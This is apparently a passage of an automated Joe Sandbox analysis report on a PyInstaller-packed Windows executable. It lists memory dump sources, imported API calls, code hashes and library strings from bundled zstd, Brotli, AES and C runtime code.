                                                                                                                                                                                                            • Instruction Fuzzy Hash: AE51F536609BA186D634AF26E4181BAF7A1FB98B62F004121EBCF53694DF3CD045DB20
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3286045317.00007FF8A8131000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF8A8130000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286027871.00007FF8A8130000.00000002.00000001.01000000.00000022.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286080256.00007FF8A818A000.00000002.00000001.01000000.00000022.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286165822.00007FF8A81FF000.00000004.00000001.01000000.00000022.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286191545.00007FF8A8201000.00000002.00000001.01000000.00000022.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286191545.00007FF8A8205000.00000002.00000001.01000000.00000022.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a8130000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn$Size$Arg_Buffer_Bytes_FromParseReleaseStringTuple_
                                                                                                                                                                                                            • String ID: BrotliDecoderDecompressStream failed while processing the stream$y*:process
                                                                                                                                                                                                            • API String ID: 2462486908-3378180327
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3286045317.00007FF8A8131000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF8A8130000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a8130000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn$Size$Arg_Buffer_Bytes_FromParseReleaseStringTuple_
                                                                                                                                                                                                            • String ID: BrotliEncoderCompressStream failed while processing the stream$y*:process
                                                                                                                                                                                                            • API String ID: 2462486908-243030088
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 349153199-0
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285221052.00007FF8A7E71000.00000020.00000001.01000000.0000003B.sdmp, Offset: 00007FF8A7E70000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7e70000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 349153199-0
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3286045317.00007FF8A8131000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF8A8130000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a8130000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: memmove$Xbad_alloc@std@@Xlength_error@std@@malloc
                                                                                                                                                                                                            • String ID: vector<T> too long
                                                                                                                                                                                                            • API String ID: 1899970315-3788999226
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Err_FromLongLong_String
                                                                                                                                                                                                            • String ID: error ending compression stream: %s$stream is closed$w*:readinto1
                                                                                                                                                                                                            • API String ID: 1736172965-504963644
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Err_FromLongLong_String
                                                                                                                                                                                                            • String ID: error ending compression stream: %s$stream is closed$w*:readinto
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Object_$StringTrue$Arg_AttrCallErr_Keywords_ObjectParseSizeTuple
                                                                                                                                                                                                            • String ID: O|kOO:stream_writer$must pass an object with a write() method$write
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000,00007FF7ACE826A0), ref: 00007FF7ACE87447
                                                                                                                                                                                                            • FormatMessageW.KERNEL32(00000000,00007FF7ACE826A0), ref: 00007FF7ACE87476
                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32 ref: 00007FF7ACE874CC
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACE82620: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF7ACE876B4,?,?,?,?,?,?,?,?,?,?,?,00007FF7ACE8101D), ref: 00007FF7ACE82654
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACE82620: MessageBoxW.USER32 ref: 00007FF7ACE8272C
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ErrorLastMessage$ByteCharFormatMultiWide
                                                                                                                                                                                                            • String ID: Failed to encode wchar_t as UTF-8.$FormatMessageW$No error messages generated.$PyInstaller: FormatMessageW failed.$PyInstaller: pyi_win32_utils_to_utf8 failed.$WideCharToMultiByte
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,00007FF8A7FF3BB3), ref: 00007FF8A807702F
                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,00007FF8A7FF3BB3), ref: 00007FF8A8077043
                                                                                                                                                                                                            • WakeAllConditionVariable.KERNEL32(?,?,?,?,?,?,00000000,00007FF8A7FF3BB3), ref: 00007FF8A8077050
                                                                                                                                                                                                            • WakeAllConditionVariable.KERNEL32(?,?,?,?,?,?,00000000,00007FF8A7FF3BB3), ref: 00007FF8A807705D
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(?,?,?,?,?,?,00000000,00007FF8A7FF3BB3), ref: 00007FF8A8077090
                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00007FF8A7FF3BB3), ref: 00007FF8A807709D
                                                                                                                                                                                                            • DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,00007FF8A7FF3BB3), ref: 00007FF8A80770B9
                                                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,00000000,00007FF8A7FF3BB3), ref: 00007FF8A80770FB
                                                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,00000000,00007FF8A7FF3BB3), ref: 00007FF8A8077133
                                                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,00000000,00007FF8A7FF3BB3), ref: 00007FF8A8077169
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CriticalSectionfree$ConditionVariableWake$DeleteEnterErrorLastLeaveObjectSingleWait
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                            • String ID: f$f$p$p$f
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Err_$Arg_FormatKeywords_ParseSizeStringTuple
                                                                                                                                                                                                            • String ID: must only specify one of level or compression_params$must specify one of level or compression_params$unable to free CDict: %s$unable to precompute dictionary$|iO!:precompute_compress
                                                                                                                                                                                                            • API String ID: 891019847-2011864325
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285221052.00007FF8A7E71000.00000020.00000001.01000000.0000003B.sdmp, Offset: 00007FF8A7E70000, based on PE: true
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _wassert$memcpy
                                                                                                                                                                                                            • String ID: ((Nk==4) && (Nr==10)) || ((Nk==6) && (Nr==12)) || ((Nk==8) && (Nr==14))$(idx>=1) && (idx<=10)$src/AESNI.c$src/AESNI.c
                                                                                                                                                                                                            • API String ID: 4292997394-722309440
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: __acrt_iob_func$__stdio_common_vfprintffflushfprintf
                                                                                                                                                                                                            • String ID: warning : ZSTD_compressBegin_usingCDict failed $warning : could not compress sample size %u
                                                                                                                                                                                                            • API String ID: 2484644911-1446316337
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Err_Format
                                                                                                                                                                                                            • String ID: unable to retrieve parameter: %s$unable to retrieve parameter: %s$unable to retrieve parameter: %s$unable to retrieve parameter: %s$unable to retrieve parameter: %s$unable to retrieve parameter: %s$unable to retrieve parameter: %s
                                                                                                                                                                                                            • API String ID: 376477240-1435523161
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Process_invalid_parameter_noinfo$ByteCharCodeCommandConsoleCreateCtrlExitHandlerInfoLineMultiObjectSingleStartupWaitWide
                                                                                                                                                                                                            • String ID: CreateProcessW$Error creating child process!
                                                                                                                                                                                                            • API String ID: 2895956056-3524285272
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Err_$Arg_CallDeallocFormatKeywords_MallocMem_MemoryObjectObject_ParseSizeTuple
                                                                                                                                                                                                            • String ID: error setting source size: %s$|Kk:chunker
                                                                                                                                                                                                            • API String ID: 678430365-3480732574
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Err_$Arg_CallDeallocFormatKeywords_MallocMem_MemoryObjectObject_ParseSizeTuple
                                                                                                                                                                                                            • String ID: error setting source size: %s$|K:compressobj
                                                                                                                                                                                                            • API String ID: 678430365-3998477729
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Arg_Buffer_Err_FormatKeywords_ParseReleaseSizeTuple
                                                                                                                                                                                                            • String ID: cannot get frame parameters: %s$not enough data for frame parameters; need %zu bytes$y*:get_frame_parameters
                                                                                                                                                                                                            • API String ID: 2231244333-922659078
                                                                                                                                                                                                            • Opcode ID: 8afd3e7f8eb88f7a59202280d6d82ccb8c528c37513712f5a0adb092143040e9
                                                                                                                                                                                                            • Instruction ID: 95e72ae1338570571ba0bedf46140043e261b5ac13d32914d7cc7678cfb082ce
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8afd3e7f8eb88f7a59202280d6d82ccb8c528c37513712f5a0adb092143040e9
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 40217C61A0AB46A2EE108B61E85037E73A0FB94BD0F440136D95E877E4DF7CE165D718
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Err_$Arg_Buffer_FormatKeywords_MallocMem_MemoryParseReleaseSizeTuple
                                                                                                                                                                                                            • String ID: invalid dictionary load mode: %d; must use DICT_TYPE_* constants$y*|I:ZstdCompressionDict
                                                                                                                                                                                                            • API String ID: 3590267281-302309102
                                                                                                                                                                                                            • Opcode ID: 03def8c46e77027d31ebccbb247a34806563c8a1fd9ea056bdcc75c25c9c6cf3
                                                                                                                                                                                                            • Instruction ID: 0df3c2f87d5c0f24d14bd98e5035cee29f829ce014ed5e0ff6d71dc76fe384b8
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 03def8c46e77027d31ebccbb247a34806563c8a1fd9ea056bdcc75c25c9c6cf3
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 53214836A19B5191EB00CF25E84466D33A8FB98FD0F210136EA9D937A4DF39D966C380
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.VCRUNTIME140(?,?,?,?,?,?,?,?,00000000,00007FF8A7FF350E), ref: 00007FF8A807727D
                                                                                                                                                                                                            • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00007FF8A7FF350E), ref: 00007FF8A8077289
                                                                                                                                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00007FF8A7FF350E), ref: 00007FF8A80772CB
                                                                                                                                                                                                            • InitializeCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF8A7FF350E), ref: 00007FF8A80772EE
                                                                                                                                                                                                            • InitializeConditionVariable.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF8A7FF350E), ref: 00007FF8A80772FB
                                                                                                                                                                                                            • InitializeConditionVariable.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF8A7FF350E), ref: 00007FF8A8077308
                                                                                                                                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00007FF8A7FF350E), ref: 00007FF8A807733B
                                                                                                                                                                                                              • Part of subcall function 00007FF8A8077010: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,00007FF8A7FF3BB3), ref: 00007FF8A807702F
                                                                                                                                                                                                              • Part of subcall function 00007FF8A8077010: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,00007FF8A7FF3BB3), ref: 00007FF8A8077043
                                                                                                                                                                                                              • Part of subcall function 00007FF8A8077010: WakeAllConditionVariable.KERNEL32(?,?,?,?,?,?,00000000,00007FF8A7FF3BB3), ref: 00007FF8A8077050
                                                                                                                                                                                                              • Part of subcall function 00007FF8A8077010: WakeAllConditionVariable.KERNEL32(?,?,?,?,?,?,00000000,00007FF8A7FF3BB3), ref: 00007FF8A807705D
                                                                                                                                                                                                              • Part of subcall function 00007FF8A8077010: WaitForSingleObject.KERNEL32(?,?,?,?,?,?,00000000,00007FF8A7FF3BB3), ref: 00007FF8A8077090
                                                                                                                                                                                                              • Part of subcall function 00007FF8A8077010: GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00007FF8A7FF3BB3), ref: 00007FF8A807709D
                                                                                                                                                                                                              • Part of subcall function 00007FF8A8077010: DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,00007FF8A7FF3BB3), ref: 00007FF8A80770B9
                                                                                                                                                                                                              • Part of subcall function 00007FF8A8077010: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,00000000,00007FF8A7FF3BB3), ref: 00007FF8A80770FB
                                                                                                                                                                                                              • Part of subcall function 00007FF8A8077010: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,00000000,00007FF8A7FF3BB3), ref: 00007FF8A8077133
                                                                                                                                                                                                              • Part of subcall function 00007FF8A8077010: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,00000000,00007FF8A7FF3BB3), ref: 00007FF8A8077169
                                                                                                                                                                                                            • _beginthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,00000000,00007FF8A7FF350E), ref: 00007FF8A80773B6
                                                                                                                                                                                                            • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,00000000,00007FF8A7FF350E), ref: 00007FF8A80773C4
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ConditionCriticalSectionVariable$Initializefree$Wakemalloc$DeleteEnterErrorLastLeaveObjectSingleWait_beginthreadex_errnocallocmemset
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 4219922926-0
                                                                                                                                                                                                            • Opcode ID: 87865d02dce3f75ed65f7839ca0527b85f5c116865141503dd330cd953cafaa9
                                                                                                                                                                                                            • Instruction ID: a9d4db93e6ef8595966e7679b13d13583f2725b3b4e7c8c4b2c964df94a5c817
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 87865d02dce3f75ed65f7839ca0527b85f5c116865141503dd330cd953cafaa9
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 66518932A0AF45A7EF148F25E90026977A0FB59BC4F588635DB8D03B94DF38E4718728
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                            • String ID: csm$csm$csm
                                                                                                                                                                                                            • API String ID: 849930591-393685449
                                                                                                                                                                                                            • Opcode ID: 905927d9e3da027d40e91907a7f1dd58b6d09944997845db9437df3d999e9f33
                                                                                                                                                                                                            • Instruction ID: 5d1751316ef1f5eab15ddae75398b5635df98f9a966358a2baaa60517066b618
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 905927d9e3da027d40e91907a7f1dd58b6d09944997845db9437df3d999e9f33
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0DE1D732A0D78296EB20AF65D6413ADB7E0FB45B89F410135EE4DABB65CF38E580C710
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Err_$Arg_FormatInfoKeywords_MemoryParseSizeSystemTuplememset
                                                                                                                                                                                                            • String ID: unable to set compression context parameter: %s$|iiiiiiiiiiiiiiiiiiiii:ZstdCompressionParameters
                                                                                                                                                                                                            • API String ID: 2335633291-3280494838
                                                                                                                                                                                                            • Opcode ID: 8c89cfe1c5ed62ba8a828cc8dcbf265d0d08592995f1d36c9b8f24490d137185
                                                                                                                                                                                                            • Instruction ID: bb9e5c745899a1d5444e772b0ee9730f699d9d9f6fd9f3dc9e33381eeb50bf9b
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8c89cfe1c5ed62ba8a828cc8dcbf265d0d08592995f1d36c9b8f24490d137185
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8AD11222B26A109AEB10DF75C4501AD3764EB89BB8F104336DA3D5BBD9CFB9D910DB04
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • FreeLibrary.KERNEL32(?,00000000,?,00007FF7ACE9E082,?,?,0000020830AB8C48,00007FF7ACE9A153,?,?,?,00007FF7ACE9A04A,?,?,?,00007FF7ACE953A2), ref: 00007FF7ACE9DE64
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,00000000,?,00007FF7ACE9E082,?,?,0000020830AB8C48,00007FF7ACE9A153,?,?,?,00007FF7ACE9A04A,?,?,?,00007FF7ACE953A2), ref: 00007FF7ACE9DE70
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285072056.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285112439.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEC0000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285184571.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                            • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                            • API String ID: 3013587201-537541572
                                                                                                                                                                                                            • Opcode ID: 3f9ea5ddd66982662272f3b60427da02763780b89cc10366f1f57cf1354b879c
                                                                                                                                                                                                            • Instruction ID: ef2aa6d2e5a971071294e3ceaeec42b4989394e42f5454e2013f99957e563748
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3f9ea5ddd66982662272f3b60427da02763780b89cc10366f1f57cf1354b879c
                                                                                                                                                                                                            • Instruction Fuzzy Hash: B4413671B1F61271FA15AB169810575E792BF04BA0F8A4235ED0DBB7B8EF3CE5058320
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7ACE8101D), ref: 00007FF7ACE8760F
                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7ACE8101D), ref: 00007FF7ACE8765F
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285072056.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285112439.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEC0000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285184571.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ByteCharMultiWide
                                                                                                                                                                                                            • String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
                                                                                                                                                                                                            • API String ID: 626452242-27947307
                                                                                                                                                                                                            • Opcode ID: 4bbd7603499378b50442979c546d1f664acf9c627e90c3cd8d10ddb09143890f
                                                                                                                                                                                                            • Instruction ID: e2ec6177175a16ff15230b6a86fbe89e2ea7d453b012df15b2b9d915e3ad3769
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4bbd7603499378b50442979c546d1f664acf9c627e90c3cd8d10ddb09143890f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: A4419032A0EB82D6E720EF15B44016AF7A4FB84791F9A4135EA8D57BA8DF3CD052D710
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Err_FromLongLong_String
                                                                                                                                                                                                            • String ID: stream is closed$w*:readinto1
                                                                                                                                                                                                            • API String ID: 1736172965-3314369067
                                                                                                                                                                                                            • Opcode ID: 0700df6bf420ed018e7d1d079cb7901cd5b62d4c9962ab880261884f11276b6c
